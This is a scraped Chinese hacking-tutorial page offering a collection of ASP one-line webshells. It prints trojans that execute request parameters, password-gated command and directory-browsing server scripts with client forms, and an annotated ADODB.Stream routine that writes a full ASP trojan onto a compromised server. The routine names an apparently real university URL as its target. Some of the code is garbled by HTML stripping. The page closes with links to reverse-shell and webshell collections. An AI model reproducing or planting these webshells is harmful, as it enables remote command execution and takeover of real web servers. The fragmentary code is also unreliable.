【入侵技术】 ASP一句话木马大全

""Then Execute(Request("MH"))%>

""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>

1asp一句话木马

一句话木马 服务器端

带验证:

cmd.asp

if request("authkey")="pic16f873a" then

%>

end if

%>

带验证 客户端

cmd.html

Host:

Cmd :

οnclick="Javascipt:frm.action=document.frm.act.value;

frm.submit();"

type=button value="Send Command">

目录浏览

服务器端

if request("authkey")="pic16f873a" then

szPara = Request.Form("path")

set shell=server.createobject("shell.application")

set dir1=shell.namespace(szPara)

set diritems=dir1.items

for each iii in diritems

response.write iii.path & "[" & iii.size&"]
"

next

end if

%>

客户端

Host:

Path:

type=button value="Send Command">

一句话木马客户端源文件:

里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了

//"action="后面是需要修改的以asp命名的数据库的提交地址

//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

//这里的value值根据服务端中value而设定

//可以自行修改成相应这里的value值也必须改为p

setlP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "wei.asp"//转向生成的wei.asp和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面

//这段程序的功能:利用插入到数据库文件的这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了

添入生成木马的内容/textarea>

//这段标签是你用来添加木马内容用的

程序的主要框架是

//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

//添加木马内容用的

其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~哈哈

asp一句话html,asp常用的一句话木马大全相关推荐

  1. 常用的一句话反弹shell总结

    目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹she ...

  2. 一句话木马、中国菜刀、图片一句话制作、过狗一句话

    一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用. 常用一句话木马 asp一句话木马: <%execute(request("value"))%& ...

  3. java一句话木马连接_webshell一句话木马大全

    比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 程序代码 程序代码 程序代码 程序代码 程序代码 [code] [code] 程序代码 %> 程序代 ...

  4. webshell一句话木马大全

    转载:来自WebShell'S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马 ...

  5. php一句话大全,[各种一句话木马大全]各种一句话

    PHP一句话: 1.普通一句话 2.防爆破一句话 <?php substr(md5($_REQUEST['x']),28)=='ac3a'&&eval($_REQUEST['pa ...

  6. php 木马 加密,PHP木马大全 一句话的PHP木马的防范

    PHP木马大全 一句话的PHP木马的防范 (2015-01-28 22:12:07) 标签: it 分类: php php后门木马常用的函数大致上可分为四种类型: 1. 执行系统命令: system, ...

  7. ASP.NET 程序中常用的三十三种代码(1)

    ASP.NET 程序中常用的三十三种代码(1) 1. 打开新的窗口并传送参数: 传送参数: response.write("<script>window.open('*.ASPx ...

  8. PHP一句话木马大全

    由于PHP一句话木马可以说有很多,简单的.中等的.复杂的-,今天主要是分享一些比较强悍的一些PHP一句话木马大全: 一.利用404页面隐藏PHP小马 <!DOCTYPE HTML PUBLIC ...

  9. ASP.NET程序中常用代码汇总-1[转]

    相关链接: ASP.NET程序中常用代码汇总-1 ASP.NET程序中常用代码汇总-2[转] ASP.NET程序中常用代码汇总-3[转] ASP.NET程序中常用代码汇总-4[转] ASP.NET程序 ...

最新文章

  1. Dev c++工具将C代码生成dll文件以及如何调用dll文件
  2. TensorFlow 笔记3--模型的保存与恢复
  3. HTML 5 中的新元素
  4. thinkphp在IIS7.5+环境下部署出现的URL重写问题解决方法
  5. maven setting文件_只用一招,让你Maven依赖下载速度快如闪电
  6. EasyUI:导出datagrid数据到桌面
  7. 金蝶专业版怎么反过账当月_金蝶kis怎么反记账-反过账-反结账
  8. 2020年最值得收藏的60个AI开源工具
  9. 【北京迅为】i.MX6ULL终结者MPU6050 六轴传感器例程原理分析
  10. Android Studio设置Eclipse快捷键
  11. 状态码406解决方式
  12. python和机器人_python 机器人
  13. 核心网技术之SDN学习总结
  14. javaScript-力扣-题库-11. 盛最多水的容器
  15. RESTful架构和实现级别
  16. Poco C++库简介
  17. TcaplusDB亮相全球云计算大会 一举斩获优秀解决方案奖
  18. 国内外学习科学研究机构简介…
  19. Vue + ElementUI 实现后台管理系统模板 -- 前端篇(四):定义主页面
  20. 非正版Windows用户安装windows media player 11

热门文章

  1. 从零开始的Unity萌导书#1:Hello,Unity! 1
  2. Unity URP 2020 设置DOTS
  3. php7.4 源码安装
  4. vscode写R语言代码
  5. git合并某个或某些提交到其他分支
  6. 打开计算机任务栏有桌面没,开机后桌面没有图标任务栏无显示怎么解决
  7. ai如何置入_ai图片(ai怎么把图片嵌入到图形里)
  8. 使用IDEA整合SpringMVC和Mybatis(SSM框架)(二)
  9. h3c交换机模拟器怎么用_由浅入深学习网络设备模拟器HCL 第二篇 交换机的基本配置...
  10. anaconda安装pythonocc